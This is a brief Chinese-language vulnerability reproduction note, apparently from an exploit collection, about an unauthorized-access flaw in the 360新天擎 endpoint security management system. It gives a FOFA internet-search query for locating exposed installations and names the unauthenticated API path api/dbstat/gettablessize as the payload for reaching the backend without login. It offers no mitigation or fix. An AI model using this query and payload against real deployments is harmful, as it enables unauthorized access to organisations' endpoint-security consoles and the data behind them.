2-2360-360新天擎终端安全管理系统-PermissionAC

漏洞描述：

360新天擎终端安全管理系统api/dbstat/gettablessize接口存在未授权访问，不需要登陆对后台进行操作。

网站图片:

网络测绘:

fofa语法：

title=“360新天擎”

漏洞复现:

payload：

api/dbstat/gettablessize

效果图:

参考链接:

https://blog.csdn.net/weixin_43650289/article/details/115668742?spm=1001.2101.3001.6650.7&utm_medium=distribute.pc_relevant.none-task-blog-2%7Edefault%7EBlogCommendFromBaidu%7ERate-7-115668742-blog-132889165.235%5Ev43%5Econtrol&depth_1-utm_source=distribute.pc_relevant.none-task-blog-2%7Edefault%7EBlogCommendFromBaidu%7ERate-7-115668742-blog-132889165.235%5Ev43%5Econtrol